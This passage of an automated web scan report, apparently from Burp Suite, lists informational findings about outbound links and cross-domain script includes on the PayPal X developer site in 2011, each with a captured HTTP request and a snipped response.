<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.21. https://www.x.com/community/ppx/xspaces/security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/security?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=63485 t=1313157056171515
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.22. https://www.x.com/community/ppx/xspaces/social  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/social?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:48 GMT; Path=/
Vary: User-Agent
JP: D=112661 t=1313157048041564
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.23. https://www.x.com/community/ppx/xspaces/subscriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/subscriptions?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323038343b31342c323235313b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=202616 t=1313157054314990
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.24. https://www.x.com/community/ppx/xspaces/web_checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/web_checkout?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323034393b31342c323236383b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=151824 t=1313157043372809
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.25. https://www.x.com/community/ppx/xspaces/web_checkout/nvp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/web_checkout/nvp?view=discussions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323035343b31342c323236363b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=173918 t=1313157045591560
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.26. https://www.x.com/community/xcommerce-blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<br/>What an exciting time it&rsquo;s been since we <a class="jive-link-external-small" href="https://www.thepaypalblog.com/2011/03/third-paypal-x-developer-challenge-google-android-apps/">first announced</a>
...[SNIP]...
<br/><a class="jive-link-external-small" href="https://market.android.com/details?id=se.mopper.android">Mopper:</a>
...[SNIP]...
<p class="MsoNormal" style="margin-bottom: 0.0001pt;">I&rsquo;m thrilled to let you&#160; know that starting today, X.commerce has <a class="jive-link-external-small" href="https://www.innovateregistration.com/main.aspx">opened&#160; registration</a>
...[SNIP]...
<p class="MsoNormal" style="margin-bottom: 0.0001pt;">Be&#160; sure to <a class="jive-link-external-small" href="https://www.innovateregistration.com/main.aspx">register</a>
...[SNIP]...
">More information will be&#160; available soon on speakers, session tracks and more so stay tuned,&#160; spread the word to your colleagues, follow us on Twitter at @X_commerce&#160; and register at: <a class="jive-link-external-small" href="https://www.innovateregistration.com/main.aspx">https://www.innovateregistration.com/main.aspx</a>
...[SNIP]...

6.27. https://www.x.com/docs/DOC-1106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /docs/DOC-1106?decorator=print HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130363b3130322c313034313b3130322c313333323b3130322c313433313b3130322c313337343b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=137335 t=1313157249447398
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>X Developer Network: Using the Button Manager API [Official]</title>
...[SNIP]...
</samp>, and such), enable you to specify the same HTML variables as you ordinarily do using Website Payments Standard; for information see <a class="jive-link-external-small" href="https://cms.paypal.com/us/cgi-bin/?cmd=_render-content&amp;content_ID=developer/e_howto_html_Appx_websitestandard_htmlvariables">HTML Variables for Website Payments Standard</a>
...[SNIP]...

6.28. https://www.x.com/index.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /index.jspa

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.jspa?ssocancel=true&token=HA-KJ8ZLGBZ3CZ96 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=68166 t=1313157007904024
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

6.29. https://www.x.com/people  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /people?view=status&cid=2276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=2869310 t=1313157262442054
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

6.30. https://www.x.com/people/BaldGeek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /people/BaldGeek?view=profile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=172512 t=1313157108680796
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.31. https://www.x.com/tags  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tags?tags=adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=213725 t=1313157506462289
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

7. Cross-domain script include  previous  next
There are 258 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. https://www.x.com/blogs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blogs/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=326233 t=1313157099727104
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.4. https://www.x.com/bookmarks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /bookmarks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bookmarks/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=66839 t=1313157102611640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.5. https://www.x.com/community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=326653 t=1313157029520695
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
